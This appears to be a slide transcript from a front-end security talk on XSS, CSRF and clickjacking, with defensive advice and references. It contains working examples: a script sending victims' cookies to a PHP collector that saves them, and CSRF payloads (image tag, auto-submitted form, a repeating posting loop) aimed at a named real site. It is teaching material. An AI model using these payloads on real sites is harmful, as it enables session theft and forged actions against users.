F2e security
    Presentation Transcript

    • Cross-site scripting XSS
    • XSS
    • Cookie, DOM, …
    • Yupoo XSS
    • alert
    • Javascript

```javascript
// Injected script: sends the victim's cookie to the collector (slide example)
var img = new Image();
img.src = "get_cookie.php?var=" + encodeURI(document.cookie);
```

      PHP

```php
<?php
// Collector: writes each received cookie to a timestamped file (slide example)
if (isset($_GET['var'])) {
    file_put_contents('./cookie/' . time() . '.txt', urldecode($_GET['var']));
}
```
    • Filter input, Escape output
    • Cookie
    • noscript?
    • http://en.wikipedia.org/wiki/Cross-site_scripting
    • http://www.gracecode.com/archives/2517
    • http://www.gracecode.com/archives/2491
    • http://ha.ckers.org/xss.html
    • http://www.xssed.com/
    • CSRF Cross Site Request Forgery
    • GET-based forgery via an image tag:

```html
<img src="http://.../del.php?id=64" />
```

    • POST-based forgery via an auto-submitted form:

```html
<form action="http://jiwai.de/wo/status/update" method="post">
  <textarea name="jw_status"></textarea>
  <input type="submit" />
</form>
```

    • GET, POST
    • Repeated forged requests from script:

```javascript
setInterval(function () {
  var img = new Image();
  var message = "...";   // message text not recoverable from the slide
  var api = "http://jiwai.de/wo/status/update";
  img.src = api + "?jw_status=" + message + "&t=" + +new Date();
}, 1000);
```
    • GET / POST, Cookie
    • Referer
    • Token
    • _tb_token_
    • Referer
    • http://en.wikipedia.org/wiki/Cross-site_request_forgery
    • http://www.cgisecurity.com/csrf-faq.html
    • http://www.80sec.com/csrf-securit.html
    • http://www.playhack.net/view.php?id=31
    • Twitter Clickjacking
    • 1. iframe Twitter 0
      2.
      3. Twitter
    • CSRF
    • Cookie Session
    • JS
    • Q&A
    • Closing slide:

```javascript
alert(/tHx/).replace(/.+/, eval);
```